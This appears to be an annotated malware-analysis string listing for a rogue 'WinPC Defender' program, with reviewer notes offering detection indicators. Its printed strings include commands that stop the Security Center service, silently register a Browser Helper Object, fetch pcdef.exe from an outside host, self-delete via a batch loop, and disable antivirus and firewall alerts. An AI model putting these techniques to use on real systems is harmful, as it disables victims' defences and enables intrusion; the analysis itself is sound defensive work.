Ultra String Reference Plugin
Address Disassembly Text String
; Row layout: address of the referencing instruction, the instruction itself,
; then the text the plugin found at the operand address.
;
; This run holds date/time format tokens ("gg", "yyyy", "AM/PM", "m/d/yy",
; ":mm:ss", ...).
; NOTE(review): these look like a runtime library's date formatter rather than
; logic written for this sample -- confirm before spending triage time here.
0040823B mov edx, 0040834C gg
004083A2 mov edx, 00408444 yy
004083B1 mov edx, 00408450 yyyy
004087D0 mov edx, 00408BE8 AM/PM
004087E5 mov edx, 00408BF0 A/PAMPM
004087FA mov edx, 00408BF4 AMPM
0040893C mov edx, 00408BE8 AM/PM
00408979 mov edx, 00408BF0 A/PAMPM
004089B6 mov edx, 00408BF4 AMPM
004089FF mov edx, 00408BFC AAAA
; NOTE(review): 00408A46 is listed twice for the same operand (00408C04).
; The "AAA" row fits the neighbouring format tokens; the other row's text is
; the tail of the Security Center registry path that appears in full at
; 00413ED0, so it is presumably a plugin mis-resolution -- verify in the
; debugger before treating 00408A46 as a reference to that key.
00408A46 mov edx, 00408C04 osoft\Security Center\AntiVirusDisableNotify
00408A46 mov edx, 00408C04 AAA
; No text was resolved for the operand of the next row.
00408ADE mov eax, 00408C08
00408C3B mov eax, 00408C64 C
00408FDD mov eax, 00409270 e
004092A8 mov ecx, 00409464 AM
004092D1 mov ecx, 00409470 PM
004093C2 mov ecx, 00409464 AM
004093EB mov ecx, 00409470 PM
00409859 mov ecx, 004098E8 1
00409920 mov ecx, 00409ACC 1
004099E7 mov edx, 00409AD0 gg
00409A00 mov edx, 00409ADC gggyyyy
00409A0D mov edx, 00409AE0 yyyy
00409A26 mov edx, 00409AF0 eeee
00409A35 mov edx, 00409AF8 yy
00409A4E mov edx, 00409B04 ee
00409A69 mov edx, 00409B10 e
00409BED mov edi, 00409CA4 .
00409D10 push 00409D6C \r\n
; Second cluster of format tokens (0040AD10-0040AF36); the "0" at 0040AF90 is
; referenced seven times.
0040AD10 mov ecx, 0040AF90 0
0040AD34 mov ecx, 0040AF90 0
0040AD7E mov ecx, 0040AF90 0
0040ADB5 mov ecx, 0040AF9C m/d/yy
0040ADE2 mov ecx, 0040AFAC mmmm d, yyyy
0040AE22 mov ecx, 0040AFC4 am
0040AE44 mov ecx, 0040AFD0 pm
0040AE76 mov ecx, 0040AF90 0
0040AE98 mov edx, 0040AFDC h
0040AEA7 mov edx, 0040AFE8 hh
0040AEB5 mov ecx, 0040AF90 0
0040AED8 mov ecx, 0040AF90 0
0040AEFA mov edx, 0040AFF4 AMPM
0040AF09 mov edx, 0040B004 AMPM
0040AF36 push 0040B020 :mm:ss
; Module and export names referenced as text. A DLL name followed by a run of
; export-name rows is consistent with resolving APIs by name at run time; the
; resolving calls are not part of this listing -- confirm in the disassembly.
0040B049 push 0040B080 kernel32.dll
; NOTE(review): the operands in the 004151xx/004152xx range resolve to short,
; odd text, and 0040B3DF / 0040B3F4 / 0040B53B are each listed twice with
; different text. Presumably these point at data rather than strings -- treat
; the text column as noise here until verified.
0040B3B5 mov eax, 00415260 <b@
0040B3DF mov eax, 00415160 0
0040B3DF mov eax, 00415160 -1
0040B3F4 mov eax, 00415158 $
0040B3F4 mov eax, 00415158 Xi@
0040B528 mov eax, 0040B1A0 (
0040B53B mov eax, 00415158 $
0040B53B mov eax, 00415158 Xi@
0040B540 mov edx, 0040B580 0x
; oleaut32.dll variant helpers referenced by name.
; NOTE(review): two rows run into the following name
; ("VariantChangeTypeExVarNeg", "VarIdivVarMod"); the plugin apparently did not
; stop at the end of the first name, so read each as two adjacent names.
0040BA38 push 0040BC2C oleaut32.dll
0040BA4B mov eax, 0040BC3C VariantChangeTypeExVarNeg
0040BA61 mov eax, 0040BC50 VarNeg
0040BA77 mov eax, 0040BC58 VarNot
0040BA8D mov eax, 0040BC60 VarAdd
0040BAA3 mov eax, 0040BC68 VarSub
0040BAB9 mov eax, 0040BC70 VarMul
0040BACF mov eax, 0040BC78 VarDiv
0040BAE5 mov eax, 0040BC80 VarIdivVarMod
0040BAFB mov eax, 0040BC88 VarMod
0040BB11 mov eax, 0040BC90 VarAnd
0040BB27 mov eax, 0040BC98 VarOr
0040BB3D mov eax, 0040BCA0 VarXor
0040BB53 mov eax, 0040BCA8 VarCmp
0040BB69 mov eax, 0040BCB0 VarI4FromStr
0040BB7F mov eax, 0040BCC0 VarR4FromStr
0040BB95 mov eax, 0040BCD0 VarR8FromStr
0040BBAB mov eax, 0040BCE0 VarDateFromStr
0040BBC1 mov eax, 0040BCF0 VarCyFromStr
0040BBD7 mov eax, 0040BD00 VarBoolFromStr
0040BBED mov eax, 0040BD10 VarBstrFromCy
; Garbled text: the bytes at 0040CE04 are probably not a string in the
; encoding the plugin assumed.
0040CE78 mov ecx, 0040CE04 璇
; Variant type names. 00411640 is reported eight times for a single operand
; (00415330) -- presumably the start of a table of names, one row per entry.
00411146 mov edx, 00411230 String
004111E4 mov edx, 0041124C Array
004111F7 mov edx, 0041125C ByRef
00411640 mov eax, 00415330 Empty
00411640 mov eax, 00415330 Null
00411640 mov eax, 00415330 Smallint
00411640 mov eax, 00415330 Integer
00411640 mov eax, 00415330 Single
00411640 mov eax, 00415330 Double
00411640 mov eax, 00415330 Currency
00411640 mov eax, 00415330 Date
; ole32.dll COM entry points referenced by name.
00411B15 push 00411B88 ole32.dll
00411B25 push 00411B94 CoCreateInstanceEx
00411B35 push 00411BA8 CoInitializeEx
00411B45 push 00411BB8 CoAddRefServerProcess
00411B55 push 00411BD0 CoReleaseServerProcess
00411B65 push 00411BE8 CoResumeClassObjects
00411B75 push 00411C00 CoSuspendClassObjects
; Strings tied to a file named \ieocx.dll (referenced at 00412ACF and again at
; 00413758).
00412ACF mov edx, 00413800 \ieocx.dll
; NOTE(review): the pushes from 00412E71 to 004136A1 carry operands that land
; mid-text ("dDecrement", "lFilename", "roductVersion", ...), so they are
; presumably not genuine string pointers. The text is still useful because it
; exposes what is embedded at those addresses.
00412E71 push 00417278 j7
00412EF1 push 004176D8 dDecrement
00412F11 push 004177F0 RegQueryValueExW
00412F31 push 00417908 har_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z
00412F61 push 00417AAC erDllUnregisterServercallocfreemallocrealloc
00413111 push 00418970 H}
00413121 push 004189FC LIB
00413141 push 00418B14 le
00413151 push 00418BA0 ght
00413161 push 00418C2C lFilename
00413171 push 00418CB8 roductVersion
00413181 push 00418D44 on
; Rows 00413191-004131F1 show overlapping windows onto one embedded
; registration script (the ForceRemove / NoRemove / val / %MODULE% layout looks
; like an ATL registrar script -- confirm). What the visible text declares:
;   - an entry under 'Browser Helper Objects' for CLSID
;     {06ec6572-7280-485a-a712-c380526bc048} with NoExplorer = 1; the leading
;     part of that registry path is cut off in this listing
;   - HKCR ProgIDs IEocxApp.IEocx and IEocxApp.IEocx.1, both 'IEocx Class'
;   - InprocServer32 = %MODULE%, ThreadingModel 'Apartment',
;     TypeLib {b360243e-09e8-402f-8721-00b6798089ad}
; Defender use: the CLSID, the TypeLib GUID, the ProgIDs and the DLL name are
; candidate indicators for a registry and file sweep of suspected hosts.
00413191 push 00418DD0 Explorer\r\n {\r\n 'Browser Helper Objects'\r\n {\r\n ForceRemove {06ec6572-7280-485a-a712-c380526bc048}\r\n\t\t\t\t\t {\r\n\t\t\t\t\t\tval 'NoExplorer' = d '1'\r\n\t\t\t\t\t
004131A1 push 00418E5C {06ec6572-7280-485a-a712-c380526bc048}\r\n\t\t\t\t\t {\r\n\t\t\t\t\t\tval 'NoExplorer' = d '1'\r\n\t\t\t\t\t }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n}\r\n\r\n\r\nHKCR\r\n{\r\n\tIEocxApp.IEocx.1 = s
004131B1 push 00418EE8 }\r\n }\r\n }\r\n }\r\n}\r\n\r\n\r\nHKCR\r\n{\r\n\tIEocxApp.IEocx.1 = s 'IEocx Class'\r\n\t{\r\n\t\tCLSID = s '{06ec6572-7280-485a-a712-c380526bc048}'\r\n\t}\r\n\tIEocxApp.IEocx = s 'IEocx Class'\r\n\t{\r\n\t\tCLSID = s '{06ec6572-7280-485a
004131C1 push 00418F74 \r\n\t}\r\n\tIEocxApp.IEocx = s 'IEocx Class'\r\n\t{\r\n\t\tCLSID = s '{06ec6572-7280-485a-a712-c380526bc048}'\r\n\t\tCurVer = s 'IEocxApp.IEocx.1'\r\n\t}\r\n\tNoRemove CLSID\r\n\t{\r\n\t\tForceRemove {06ec6572-7280-485a-a712-c380526bc048} = s 'IEocx Class
004131D1 push 00419000 emove CLSID\r\n\t{\r\n\t\tForceRemove {06ec6572-7280-485a-a712-c380526bc048} = s 'IEocx Class'\r\n\t\t{\r\n\t\t\tProgID = s 'IEocxApp.IEocx.1'\r\n\t\t\tVersionIndependentProgID = s 'IEocxApp.IEocx'\r\n\t\t\tForceRemove 'Programmable'\r\n\t\t\tInprocServer3
004131E1 push 0041908C dependentProgID = s 'IEocxApp.IEocx'\r\n\t\t\tForceRemove 'Programmable'\r\n\t\t\tInprocServer32 = s '%MODULE%'\r\n\t\t\t{\r\n\t\t\t\tval ThreadingModel = s 'Apartment'\r\n\t\t\t}\r\n\t\t\t'TypeLib' = s '{b360243e-09e8-402f-8721-00b6798089ad}'\r\n\t\t}\r\n
004131F1 push 00419118 rtment'\r\n\t\t\t}\r\n\t\t\t'TypeLib' = s '{b360243e-09e8-402f-8721-00b6798089ad}'\r\n\t\t}\r\n\t}\r\n}\r\n
00413441 push 0041A554 "
004134F1 push 0041AB58 d
004136A1 push 0041BA1C leteAce
; regsvr32.exe with the /s (silent) switch, pushed shortly before the
; \ieocx.dll name: presumably the DLL is registered without any dialog. The
; code that assembles and runs the command line is not visible here -- confirm.
00413737 push 00413814 \system32\regsvr32.exe /s
00413758 push 00413800 \ieocx.dll
; Command-line text that stops the "Security Center" service through net.exe.
; How it is launched is not visible in this listing. Detection idea: process
; creation of net.exe with this argument from a non-administrative parent.
004137A6 mov edx, 00413838 \system32\net.exe stop "Security Center"
; "Windows_Updates" and a URL for pcdef.exe (host winpcdown99[.]com) are pushed
; 15 bytes apart, so they are presumably arguments to the same call. Whether
; the name is a registry value, a window title or something else cannot be
; told from here -- confirm. The host and file name are network indicators.
0041389F push 004139B0 Windows_Updates
004138AE push 004139D0 http://winpcdown99.com/pcdef.exe
; Pieces of a batch file named \asd.bat: 'del "', 'if exist "',
; '" goto Repeat', and a final 'del "' of \asd.bat itself. This is the shape of
; a delete-until-gone loop that then removes the batch file, presumably used to
; delete the running executable after it exits. The path inserted between the
; quotes and the directory that prefixes \asd.bat are not visible here.
; Defender use: a short-lived .bat with this content in a writable directory is
; a host artefact worth hunting for alongside the other indicators.
00413BAD mov ecx, 00413D40 \asd.bat
00413BF8 push 00413D64 del "
00413C10 push 00413D74 "
00413C40 push 00413D80 if exist "
00413C58 push 00413D94 " goto Repeat
00413C88 push 00413D64 del "
00413C93 push 00413DAC \asd.bat"
00413CE9 mov ecx, 00413D40 \asd.bat
; Each pair below loads a short value string into ecx and a registry-style
; path into edx. Presumably a registry write helper is called after each pair;
; the helper and the hive (HKLM/HKCU) are not visible in this listing --
; confirm before writing detection rules against a specific hive.
;
; "No" with Control Panel\don't load\<applet>.cpl: presumably keeps the named
; Control Panel applets from loading. wscui.cpl is the Security Center applet;
; "scui.cpl" may be a misspelling of it -- confirm.
00413EA3 mov ecx, 004140C4 No
00413EA8 mov edx, 004140D0 Control Panel\don't load\scui.cpl
00413EB7 mov ecx, 004140C4 No
00413EBC mov edx, 004140FC Control Panel\don't load\wscui.cpl
; "1" with the Security Center *DisableNotify values: turns off the antivirus
; and firewall status alerts. The "1" loaded at 00413EDF has no path resolved
; in this listing, so a third value may be involved.
; Defender use: alerting on writes to these values gives a behaviour-based
; detection that does not depend on the file hash.
00413ECB mov ecx, 00414128 1
00413ED0 mov edx, 00414134 SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify
00413EDF mov ecx, 00414128 1
00413EF3 mov ecx, 00414128 1
00413EF8 mov edx, 004141B8 SOFTWARE\Microsoft\Security Center\FirewallDisableNotify
; The program's own settings under Software\WinPC Defender (Minimize, Start,
; Scan, id, UpdateDate, fstart, site). The "id" row has no value string
; resolved; "site" is paired with a billing URL that ends in "?id=", so the id
; is presumably appended at run time.
00413F11 mov ecx, 004141FC 0
00413F16 mov edx, 00414208 Software\WinPC Defender\Minimize
00413F25 mov ecx, 00414128 1
00413F2A mov edx, 00414234 Software\WinPC Defender\Start
00413F39 mov ecx, 00414128 1
00413F3E mov edx, 0041425C Software\WinPC Defender\Scan
00413F53 mov edx, 00414284 Software\WinPC Defender\id
00413F62 mov ecx, 004142A8 31-03-2009
00413F67 mov edx, 004142BC Software\WinPC Defender\UpdateDate
00413F76 mov ecx, 00414128 1
00413F7B mov edx, 004142E8 Software\WinPC Defender\fstart
00413F8A mov ecx, 00414310 http://billingpayment.net/pp/?id=
00413F8F mov edx, 0041433C Software\WinPC Defender\site
; File name \pcdefender.exe, referenced three times; the directory it is
; appended to is not visible here.
00413FBB mov ecx, 00414374 \pcdefender.exe
00413FE4 mov ecx, 00414374 \pcdefender.exe
0041405E mov ecx, 00414374 \pcdefender.exe |